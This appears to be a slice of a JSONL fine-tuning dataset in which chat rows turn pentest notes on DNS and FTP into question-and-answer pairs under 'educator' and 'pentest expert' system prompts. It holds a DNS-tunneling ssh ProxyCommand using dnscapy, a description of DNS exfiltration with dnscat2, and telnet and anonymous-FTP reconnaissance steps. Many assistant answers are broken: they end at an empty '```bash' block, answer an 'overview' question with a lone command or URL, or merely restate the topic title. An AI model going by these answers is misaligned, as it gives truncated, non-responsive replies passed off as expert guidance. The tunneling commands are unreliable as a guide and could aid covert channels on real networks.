"🛠️ DNS", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Client configuration"}, {"role": "assistant", "content": "ssh -o ProxyCommand=\"sudo python dnscapy_client.py $DELEGATED_ZONE_NAME $IP_ADDR_OF_CLIENT_DNS\" yourlogin@localhost\n```"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Client configuration", "response": "ssh -o ProxyCommand=\"sudo python dnscapy_client.py $DELEGATED_ZONE_NAME $IP_ADDR_OF_CLIENT_DNS\" yourlogin@localhost\n```", "metadata": {"corpus_index": 1483, "category": "network", "source_file": "docs/src/infra/protocols/dns.md", "page_title": "🛠️ DNS", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Client configuration?"}, {"role": "assistant", "content": "ssh -o ProxyCommand=\"sudo python dnscapy_client.py $DELEGATED_ZONE_NAME $IP_ADDR_OF_CLIENT_DNS\" yourlogin@localhost\n```"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Client configuration?", "response": "ssh -o ProxyCommand=\"sudo python dnscapy_client.py $DELEGATED_ZONE_NAME $IP_ADDR_OF_CLIENT_DNS\" yourlogin@localhost\n```", "metadata": {"corpus_index": 1483, "category": "network", "source_file": "docs/src/infra/protocols/dns.md", "page_title": "🛠️ DNS", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does 🛠️ DNS - DNS Cache Snooping work?"}, {"role": "assistant", "content": "Cache snooping enables examination of a DNS server's cache to determine recently queried domains.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does 🛠️ DNS - DNS Cache Snooping work?", "response": "Cache snooping enables examination of a DNS server's cache to determine recently queried domains.\n\n```bash", "metadata": {"corpus_index": 1484, "category": "network", "source_file": "docs/src/infra/protocols/dns.md", "page_title": "🛠️ DNS", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for 🛠️ DNS - DNS Cache Snooping"}, {"role": "assistant", "content": "Cache snooping enables examination of a DNS server's cache to determine recently queried domains.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for 🛠️ DNS - DNS Cache Snooping", "response": "Cache snooping enables examination of a DNS server's cache to determine recently queried domains.\n\n```bash", "metadata": {"corpus_index": 1484, "category": "network", "source_file": "docs/src/infra/protocols/dns.md", "page_title": "🛠️ DNS", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain 🛠️ DNS - DNS Exfiltration"}, {"role": "assistant", "content": "DNS exfiltration leverages DNS queries to extract data from compromised systems. dnscat2 provides encrypted command-and-control capabilities over DNS.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain 🛠️ DNS - DNS Exfiltration", "response": "DNS exfiltration leverages DNS queries to extract data from compromised systems. dnscat2 provides encrypted command-and-control capabilities over DNS.\n\n```bash", "metadata": {"corpus_index": 1485, "category": "network", "source_file": "docs/src/infra/protocols/dns.md", "page_title": "🛠️ DNS", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out 🛠️ DNS - DNS Exfiltration during a pentest?"}, {"role": "assistant", "content": "DNS exfiltration leverages DNS queries to extract data from compromised systems. dnscat2 provides encrypted command-and-control capabilities over DNS.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out 🛠️ DNS - DNS Exfiltration during a pentest?", "response": "DNS exfiltration leverages DNS queries to extract data from compromised systems. dnscat2 provides encrypted command-and-control capabilities over DNS.\n\n```bash", "metadata": {"corpus_index": 1485, "category": "network", "source_file": "docs/src/infra/protocols/dns.md", "page_title": "🛠️ DNS", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is 🛠️ FTP - Theory?"}, {"role": "assistant", "content": "The File Transfer Protocol (FTP) is a standard network protocol used for the transfer of files between a client and server. It usually runs on ports 21/tcp or 2121/tcp."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is 🛠️ FTP - Theory?", "response": "The File Transfer Protocol (FTP) is a standard network protocol used for the transfer of files between a client and server. It usually runs on ports 21/tcp or 2121/tcp.", "metadata": {"corpus_index": 1486, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do 🛠️ FTP - Theory"}, {"role": "assistant", "content": "The File Transfer Protocol (FTP) is a standard network protocol used for the transfer of files between a client and server. It usually runs on ports 21/tcp or 2121/tcp."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do 🛠️ FTP - Theory", "response": "The File Transfer Protocol (FTP) is a standard network protocol used for the transfer of files between a client and server. It usually runs on ports 21/tcp or 2121/tcp.", "metadata": {"corpus_index": 1486, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe 🛠️ FTP - Basic usage in the context of penetration testing"}, {"role": "assistant", "content": "Standard UNIX-like commands, like cd, ls, mkdir, rm can be used. Here is a short list of some specific commands.\n\n| Command | Description |\n| -------- | --------------------------------- |\n| help | display local help information |\n| get | download file from remote server |\n| put | upload file on the remote server |\n| ascii | set the transfer type to \"ASCII\" |\n| binary | set the transfer type to \"Binary\" |\n| close | terminate FTP session |\n| bye | terminate ftp session and exit |\n\n> [!TIP]\n> When downloading files, users should set the FTP client to \"Binary\" (binary command) in order to prevent files from becoming corrupted during transit.\n> \n> Regular text file can be downloaded in the other mode : \"ASCII\" (ascii command)\n\n> [!TIP]\n> Hidden files can be listed with ls -a"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe 🛠️ FTP - Basic usage in the context of penetration testing", "response": "Standard UNIX-like commands, like cd, ls, mkdir, rm can be used. Here is a short list of some specific commands.\n\n| Command | Description |\n| -------- | --------------------------------- |\n| help | display local help information |\n| get | download file from remote server |\n| put | upload file on the remote server |\n| ascii | set the transfer type to \"ASCII\" |\n| binary | set the transfer type to \"Binary\" |\n| close | terminate FTP session |\n| bye | terminate ftp session and exit |\n\n> [!TIP]\n> When downloading files, users should set the FTP client to \"Binary\" (binary command) in order to prevent files from becoming corrupted during transit.\n> \n> Regular text file can be downloaded in the other mode : \"ASCII\" (ascii command)\n\n> [!TIP]\n> Hidden files can be listed with ls -a", "metadata": {"corpus_index": 1487, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out 🛠️ FTP - Basic usage during a pentest?"}, {"role": "assistant", "content": "Standard UNIX-like commands, like cd, ls, mkdir, rm can be used. Here is a short list of some specific commands.\n\n| Command | Description |\n| -------- | --------------------------------- |\n| help | display local help information |\n| get | download file from remote server |\n| put | upload file on the remote server |\n| ascii | set the transfer type to \"ASCII\" |\n| binary | set the transfer type to \"Binary\" |\n| close | terminate FTP session |\n| bye | terminate ftp session and exit |\n\n> [!TIP]\n> When downloading files, users should set the FTP client to \"Binary\" (binary command) in order to prevent files from becoming corrupted during transit.\n> \n> Regular text file can be downloaded in the other mode : \"ASCII\" (ascii command)\n\n> [!TIP]\n> Hidden files can be listed with ls -a"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out 🛠️ FTP - Basic usage during a pentest?", "response": "Standard UNIX-like commands, like cd, ls, mkdir, rm can be used. Here is a short list of some specific commands.\n\n| Command | Description |\n| -------- | --------------------------------- |\n| help | display local help information |\n| get | download file from remote server |\n| put | upload file on the remote server |\n| ascii | set the transfer type to \"ASCII\" |\n| binary | set the transfer type to \"Binary\" |\n| close | terminate FTP session |\n| bye | terminate ftp session and exit |\n\n> [!TIP]\n> When downloading files, users should set the FTP client to \"Binary\" (binary command) in order to prevent files from becoming corrupted during transit.\n> \n> Regular text file can be downloaded in the other mode : \"ASCII\" (ascii command)\n\n> [!TIP]\n> Hidden files can be listed with ls -a", "metadata": {"corpus_index": 1487, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about 🛠️ FTP - Banner grabbing?"}, {"role": "assistant", "content": "Useful to get basic information about the FTP server such as its type and version.\n\n``bash\ntelnet -vn $IP $PORT\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about 🛠️ FTP - Banner grabbing?", "response": "Useful to get basic information about the FTP server such as its type and version.\n\n``bash\ntelnet -vn $IP $PORT\n``", "metadata": {"corpus_index": 1488, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for 🛠️ FTP - Banner grabbing"}, {"role": "assistant", "content": "Useful to get basic information about the FTP server such as its type and version.\n\n``bash\ntelnet -vn $IP $PORT\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for 🛠️ FTP - Banner grabbing", "response": "Useful to get basic information about the FTP server such as its type and version.\n\n``bash\ntelnet -vn $IP $PORT\n``", "metadata": {"corpus_index": 1488, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the telnet command to 🛠️ ftp - banner grabbing"}, {"role": "assistant", "content": "telnet -vn $IP $PORT"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the telnet command to 🛠️ ftp - banner grabbing", "response": "telnet -vn $IP $PORT", "metadata": {"corpus_index": 1489, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "telnet"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on 🛠️ FTP - Banner grabbing"}, {"role": "assistant", "content": "telnet -vn $IP $PORT"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on 🛠️ FTP - Banner grabbing", "response": "telnet -vn $IP $PORT", "metadata": {"corpus_index": 1489, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `telnet -vn $IP $PORT`?"}, {"role": "assistant", "content": "This command is used for 🛠️ ftp - banner grabbing. Banner grabbing"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `telnet -vn $IP $PORT`?", "response": "This command is used for 🛠️ ftp - banner grabbing. Banner grabbing", "metadata": {"corpus_index": 1489, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about 🛠️ FTP - Accepted commands?"}, {"role": "assistant", "content": "The HELP and FEAT commands could give information about the FTP server such as the recognized commands and the extended features the server supports.\n\n``\nHELP\n214-The following commands are recognized (* =>'s unimplemented):\n214-CWD XCWD CDUP XCUP SMNT* QUIT PORT PASV \n214-EPRT EPSV ALLO* RNFR RNTO DELE MDTM RMD \n214-XRMD MKD XMKD PWD XPWD SIZE SYST HELP \n214-NOOP FEAT OPTS AUTH CCC CONF ENC MIC \n214-PBSZ PROT TYPE STRU MODE RETR STOR STOU \n214-APPE REST ABOR USER PASS ACCT REIN LIST \n214-NLST STAT SITE MLSD MLST \n214 Direct comments to root@drei.work\nFEAT\n211-Features:\n PROT\n CCC\n PBSZ\n AUTH TLS\n MFF modify;UNIX.group;UNIX.mode;\n REST STREAM\n MLST modify;perm;size;type;unique;UNIX.group;UNIX.mode;UNIX.owner;\n UTF8\n EPRT\n EPSV\n LANG en-US\n MDTM\n SSCN\n TVFS\n MFMT\n SIZE\n211 End\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about 🛠️ FTP - Accepted commands?", "response": "The HELP and FEAT commands could give information about the FTP server such as the recognized commands and the extended features the server supports.\n\n``\nHELP\n214-The following commands are recognized (* =>'s unimplemented):\n214-CWD XCWD CDUP XCUP SMNT* QUIT PORT PASV \n214-EPRT EPSV ALLO* RNFR RNTO DELE MDTM RMD \n214-XRMD MKD XMKD PWD XPWD SIZE SYST HELP \n214-NOOP FEAT OPTS AUTH CCC CONF ENC MIC \n214-PBSZ PROT TYPE STRU MODE RETR STOR STOU \n214-APPE REST ABOR USER PASS ACCT REIN LIST \n214-NLST STAT SITE MLSD MLST \n214 Direct comments to root@drei.work\nFEAT\n211-Features:\n PROT\n CCC\n PBSZ\n AUTH TLS\n MFF modify;UNIX.group;UNIX.mode;\n REST STREAM\n MLST modify;perm;size;type;unique;UNIX.group;UNIX.mode;UNIX.owner;\n UTF8\n EPRT\n EPSV\n LANG en-US\n MDTM\n SSCN\n TVFS\n MFMT\n SIZE\n211 End\n``", "metadata": {"corpus_index": 1490, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through 🛠️ FTP - Accepted commands"}, {"role": "assistant", "content": "The HELP and FEAT commands could give information about the FTP server such as the recognized commands and the extended features the server supports.\n\n``\nHELP\n214-The following commands are recognized (* =>'s unimplemented):\n214-CWD XCWD CDUP XCUP SMNT* QUIT PORT PASV \n214-EPRT EPSV ALLO* RNFR RNTO DELE MDTM RMD \n214-XRMD MKD XMKD PWD XPWD SIZE SYST HELP \n214-NOOP FEAT OPTS AUTH CCC CONF ENC MIC \n214-PBSZ PROT TYPE STRU MODE RETR STOR STOU \n214-APPE REST ABOR USER PASS ACCT REIN LIST \n214-NLST STAT SITE MLSD MLST \n214 Direct comments to root@drei.work\nFEAT\n211-Features:\n PROT\n CCC\n PBSZ\n AUTH TLS\n MFF modify;UNIX.group;UNIX.mode;\n REST STREAM\n MLST modify;perm;size;type;unique;UNIX.group;UNIX.mode;UNIX.owner;\n UTF8\n EPRT\n EPSV\n LANG en-US\n MDTM\n SSCN\n TVFS\n MFMT\n SIZE\n211 End\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through 🛠️ FTP - Accepted commands", "response": "The HELP and FEAT commands could give information about the FTP server such as the recognized commands and the extended features the server supports.\n\n``\nHELP\n214-The following commands are recognized (* =>'s unimplemented):\n214-CWD XCWD CDUP XCUP SMNT* QUIT PORT PASV \n214-EPRT EPSV ALLO* RNFR RNTO DELE MDTM RMD \n214-XRMD MKD XMKD PWD XPWD SIZE SYST HELP \n214-NOOP FEAT OPTS AUTH CCC CONF ENC MIC \n214-PBSZ PROT TYPE STRU MODE RETR STOR STOU \n214-APPE REST ABOR USER PASS ACCT REIN LIST \n214-NLST STAT SITE MLSD MLST \n214 Direct comments to root@drei.work\nFEAT\n211-Features:\n PROT\n CCC\n PBSZ\n AUTH TLS\n MFF modify;UNIX.group;UNIX.mode;\n REST STREAM\n MLST modify;perm;size;type;unique;UNIX.group;UNIX.mode;UNIX.owner;\n UTF8\n EPRT\n EPSV\n LANG en-US\n MDTM\n SSCN\n TVFS\n MFMT\n SIZE\n211 End\n``", "metadata": {"corpus_index": 1490, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the HELP syntax for 🛠️ ftp - accepted commands?"}, {"role": "assistant", "content": "HELP\n214-The following commands are recognized (* =>'s unimplemented):\n214-CWD XCWD CDUP XCUP SMNT* QUIT PORT PASV \n214-EPRT EPSV ALLO* RNFR RNTO DELE MDTM RMD \n214-XRMD MKD XMKD PWD XPWD SIZE SYST HELP \n214-NOOP FEAT OPTS AUTH CCC* CONF* ENC* MIC* \n214-PBSZ PROT TYPE STRU MODE RETR STOR STOU \n214-APPE REST ABOR USER PASS ACCT* REIN* LIST \n214-NLST STAT SITE MLSD MLST \n214 Direct comments to root@drei.work\nFEAT\n211-Features:\n PROT\n CCC\n PBSZ\n AUTH TLS\n MFF modify;UNIX.group;UNIX.mode;\n REST STREAM\n MLST modify*;perm*;size*;type*;unique*;UNIX.group*;UNIX.mode*;UNIX.owner*;\n UTF8\n EPRT\n EPSV\n LANG en-US\n MDTM\n SSCN\n TVFS\n MFMT\n SIZE\n211 End"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the HELP syntax for 🛠️ ftp - accepted commands?", "response": "HELP\n214-The following commands are recognized (* =>'s unimplemented):\n214-CWD XCWD CDUP XCUP SMNT* QUIT PORT PASV \n214-EPRT EPSV ALLO* RNFR RNTO DELE MDTM RMD \n214-XRMD MKD XMKD PWD XPWD SIZE SYST HELP \n214-NOOP FEAT OPTS AUTH CCC* CONF* ENC* MIC* \n214-PBSZ PROT TYPE STRU MODE RETR STOR STOU \n214-APPE REST ABOR USER PASS ACCT* REIN* LIST \n214-NLST STAT SITE MLSD MLST \n214 Direct comments to root@drei.work\nFEAT\n211-Features:\n PROT\n CCC\n PBSZ\n AUTH TLS\n MFF modify;UNIX.group;UNIX.mode;\n REST STREAM\n MLST modify*;perm*;size*;type*;unique*;UNIX.group*;UNIX.mode*;UNIX.owner*;\n UTF8\n EPRT\n EPSV\n LANG en-US\n MDTM\n SSCN\n TVFS\n MFMT\n SIZE\n211 End", "metadata": {"corpus_index": 1491, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "HELP"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for 🛠️ FTP - Accepted commands"}, {"role": "assistant", "content": "HELP\n214-The following commands are recognized (* =>'s unimplemented):\n214-CWD XCWD CDUP XCUP SMNT* QUIT PORT PASV \n214-EPRT EPSV ALLO* RNFR RNTO DELE MDTM RMD \n214-XRMD MKD XMKD PWD XPWD SIZE SYST HELP \n214-NOOP FEAT OPTS AUTH CCC* CONF* ENC* MIC* \n214-PBSZ PROT TYPE STRU MODE RETR STOR STOU \n214-APPE REST ABOR USER PASS ACCT* REIN* LIST \n214-NLST STAT SITE MLSD MLST \n214 Direct comments to root@drei.work\nFEAT\n211-Features:\n PROT\n CCC\n PBSZ\n AUTH TLS\n MFF modify;UNIX.group;UNIX.mode;\n REST STREAM\n MLST modify*;perm*;size*;type*;unique*;UNIX.group*;UNIX.mode*;UNIX.owner*;\n UTF8\n EPRT\n EPSV\n LANG en-US\n MDTM\n SSCN\n TVFS\n MFMT\n SIZE\n211 End"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for 🛠️ FTP - Accepted commands", "response": "HELP\n214-The following commands are recognized (* =>'s unimplemented):\n214-CWD XCWD CDUP XCUP SMNT* QUIT PORT PASV \n214-EPRT EPSV ALLO* RNFR RNTO DELE MDTM RMD \n214-XRMD MKD XMKD PWD XPWD SIZE SYST HELP \n214-NOOP FEAT OPTS AUTH CCC* CONF* ENC* MIC* \n214-PBSZ PROT TYPE STRU MODE RETR STOR STOU \n214-APPE REST ABOR USER PASS ACCT* REIN* LIST \n214-NLST STAT SITE MLSD MLST \n214 Direct comments to root@drei.work\nFEAT\n211-Features:\n PROT\n CCC\n PBSZ\n AUTH TLS\n MFF modify;UNIX.group;UNIX.mode;\n REST STREAM\n MLST modify*;perm*;size*;type*;unique*;UNIX.group*;UNIX.mode*;UNIX.owner*;\n UTF8\n EPRT\n EPSV\n LANG en-US\n MDTM\n SSCN\n TVFS\n MFMT\n SIZE\n211 End", "metadata": {"corpus_index": 1491, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `HELP`?"}, {"role": "assistant", "content": "This command is used for 🛠️ ftp - accepted commands. Accepted commands"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `HELP`?", "response": "This command is used for 🛠️ ftp - accepted commands. Accepted commands", "metadata": {"corpus_index": 1491, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of 🛠️ FTP - 🛠️ Files"}, {"role": "assistant", "content": "https://www.howtoforge.com/using-wget-with-ftp-to-download-move-web-sites-recursively"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of 🛠️ FTP - 🛠️ Files", "response": "https://www.howtoforge.com/using-wget-with-ftp-to-download-move-web-sites-recursively", "metadata": {"corpus_index": 1492, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out 🛠️ FTP - 🛠️ Files during a pentest?"}, {"role": "assistant", "content": "https://www.howtoforge.com/using-wget-with-ftp-to-download-move-web-sites-recursively"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out 🛠️ FTP - 🛠️ Files during a pentest?", "response": "https://www.howtoforge.com/using-wget-with-ftp-to-download-move-web-sites-recursively", "metadata": {"corpus_index": 1492, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about 🛠️ FTP - Anonymous login?"}, {"role": "assistant", "content": "Some FTP servers are configured to let users connect anonymously and thus give them access to files on the servers without authentication.\n\n``bash\n$ ftp $IP $PORT\nName: anonymous\nPassword: \nftp> ls -a # List all files (even hidden) (yes, they could be hidden)\nftp> ...\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about 🛠️ FTP - Anonymous login?", "response": "Some FTP servers are configured to let users connect anonymously and thus give them access to files on the servers without authentication.\n\n``bash\n$ ftp $IP $PORT\nName: anonymous\nPassword: \nftp> ls -a # List all files (even hidden) (yes, they could be hidden)\nftp> ...\n``", "metadata": {"corpus_index": 1493, "category": "web", "source_file": "docs/src/infra/protocols/ftp.md", "page_title": "🛠️ FTP", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for 🛠️ FTP - Anonymous login?"}, {"role": "assistant", "content": "Some FTP servers are configured to let users connect anonymously and thus give them access to files on the servers without authentication.\n\n``bash\n$ ftp $IP $PORT\nName: anonymous\nPassword: \nftp> ls -a # List all files (even hidden) (yes, they could be hidden)\nftp> ...\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for 🛠️ FTP - Anonymous login?", "response": "Some FTP servers are configured to let users connect anonymously and thus give them access to files on the servers without authentication.\n\n``bash\n$ ftp $IP $PORT\nName: anonymous\nPassword: \nftp> ls -a # List all files (even hidden) 